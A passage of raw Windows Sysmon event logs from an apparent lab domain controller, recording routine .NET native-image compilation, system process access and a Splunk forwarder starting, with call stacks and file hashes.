|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.292{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5403-00000000A301}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.292{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5403-00000000A301}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.276{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e28-0\Microsoft.GroupPolicy.Targeting.Interop.dll2021-01-18 13:49:47.276 10341000x80000000000000007654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.276{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.276{59A5CD1D-91FB-6005-5303-00000000A301}1004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.198{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.182{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.182{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5203-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.135{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5103-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.135{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5103-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.135{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5103-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:47.104{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c70-0\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll2021-01-18 13:49:47.104 10341000x80000000000000007634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.057{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.042{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:47.042{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FB-6005-5003-00000000A301}3184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
